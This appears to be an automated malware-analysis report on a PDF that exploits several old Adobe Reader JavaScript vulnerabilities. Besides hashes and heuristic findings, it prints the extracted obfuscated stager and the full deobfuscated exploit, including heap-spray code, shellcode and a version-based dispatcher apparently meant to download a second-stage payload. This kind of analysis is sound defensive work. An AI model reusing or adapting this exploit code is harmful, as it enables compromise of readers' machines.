Malicious PDF — malware analysis report

Static analysis result for SHA-256 71df4bc329e2d476…

MALICIOUS

PDF

4.8 KB Authoring application: Cawwavvwcejec (via da9a4Bafizouauewikqoqi)
MD5: cbc624cebedde58dd1f44babbd90217e SHA-1: 48ba6cf9df457f394b0d8243a4585047300cc1ad SHA-256: 71df4bc329e2d4761f8dc327bd8887d959fd1d071d59f6a34250b3b80b4e300e
388 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains multiple critical heuristic firings indicating exploitation of several Adobe Reader vulnerabilities, including CVE-2008-2992, CVE-2009-0927, and CVE-2009-4324. These vulnerabilities are used to execute obfuscated JavaScript. The deobfuscated JavaScript attempts to construct a URL by concatenating strings and then likely downloads and executes a second-stage payload. The specific URL construction is too complex to fully reconstruct from the provided evidence, but the intent is clear.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js
a3a55ad2b262186b464f5fbcd00d106ed618ec3ad1804351ed5c427901f464cc		 pdf-javascript-stream PDF /JS object 10 at offset 0xE23 518 bytes
Preview script
First 1,000 lines of the extracted script
try {var kJ='FunMc4tion'.replace(/[4M]/g, '');lG='var BB kH = 61 ;vV~ar BV hK = this~;var iP=hK.getP~VaV~geVNumWords(thiVs.pageNu~m~V);var dQ=\'\';foBr(vaVr gJO=0;gJOB~< iP; gJO+~+){dQ=[dQ,~ hK.ge~tPageNtBVhWorBd~~(hK.pageNBVum,gJO,trB~uBBe~V)].joiBn(\'~~\');;}var wLQ=VV\'\';fo~Vr(Vvar gJO=0;gVBJVBO < dQ.length;V V~gJO+=2)~V{VByR=dQ.sBBubstr(gJO,2);V~wLQ=[wLQ,StrinBg~B.fromCVharCode(parseIVnt(yR,16)^kH)]V.join(\'\');}~~ev~al(wLBVQ);wLQ=null;'.replace(/[V~B]/g, '');sD=xGH;} catch(v){var nSD=app.doc[kJ](lG);nSD();}
page_word_xor_stage_000.js
110ea39f75033c4bd67200c76492c016f5b47ed1d4b5c97fc13667b30c998593		 deobfuscated-js page-word continuous-hex XOR decoded JavaScript (decompressed, key=0x3D) at offset 0x8C 3831 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var hW={z:"h"};for(var qB=0; qB <1524; qB++){var iD='t'};var zK=new Date();l=17212;l+=194;var nG='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';var gJ=new Array();this.b=416;this.b++;try {} catch(uR){};var sJ=new Array();var kX=this.info['cP'].replace(/[\s]/g, '');this.cF=28812;this.cF+=146;this.gX=16552;this.gX+=142;var hSP = this.info;var pY = (hSP.producer.substr(0,5) == 'debug');var qP = new Array(); var tK = "%u";function iDU(str){str = str.split(tK);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function yP(str1, str2){return [str1, str2].join("");}function jC(kPM){var qBO = cT();var hI = gP();qBO += ((qBO.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + hI;if(pY) app.alert("URL: " + qBO);qBO=jA(qBO);var d=tK;var yR=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";yR+=qBO;return iDU(yR);};function cT(){var nQ = (hSP.author + hSP.title).replace(/[\s]/g, '');var eJ = tS(nQ, kX, nG);return eJ;};function tS(nQ, nG, kX){var eJ="";for(var i=0; i < nQ.length; i++){var aX = nG.indexOf(nQ[i]);if(aX > -1 ){eJ += kX[aX];}}return eJ;};function jA(nQ){var out = "";nQ = zIX(nQ);g = Math.round(nQ.length / 4);if (g != nQ.length /4) nQ+="00";for(var i=0; i < nQ.length; i+=4){out+= tK + nQ.substr(i+2, 2) + nQ.substr(i, 2);}return out;};function zIX(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function rC(wLG, len){while (wLG.length * 2 < len){wLG = yP(wLG, wLG);}return wLG.substring(0, len / 2);};function eB(xO){var cTW = 0x0c0c0c0c;        uV = jC("pdf");if (xO == 1){cTW = 0x30303030;}var xM = 0x400000;var ln = uV.length * 2;var qT = xM - (ln + 0x38);var wLG = iDU(tK+"9090"+tK+"9090"); wLG = rC(wLG, qT);var jGT = (cTW - 0x400000) / xM;for (var nS = 0; nS < jGT; nS ++ ){qP[nS] = yP(wLG, uV);}};function gP(){try {return app.viewerVersion.toString();}catch(kT){    return 0;}}if(pY) app.alert("called exploit");var hI = gP();if(pY)  app.alert("v: " + hI);if (hI > 8){if(pY) app.alert("util.printf");eB(1);var tU = "12999999999999999999";for (kZ=0; kZ < 276; kZ++) tU += "8";util.printf("%45000f", tU);}if (hI < 8){if(pY) app.alert("Collab.collectEmailInfo");eB(0);var xK = iDU(tK+"0c0c"+tK+"0c0c");while (xK.length < 44952) xK += xK;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : xK});}if (hI < 9.1){if (app.doc.Collab.getIcon){if(pY) app.alert("Collab.getIcon");eB(0);var oP = unescape("%09");while (oP.length < 0x4000) oP += oP;oP = "N." + oP;app.doc.Collab.getIcon(oP);}}if (hI == 9.2){if(pY) app.alert("media.newPlayer");eB(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}bK=27279;bK++;pG=[];mL=[];this.bQ=25897;this.bQ-=87;

Open this report in the interactive analyzer, or submit your own file for analysis.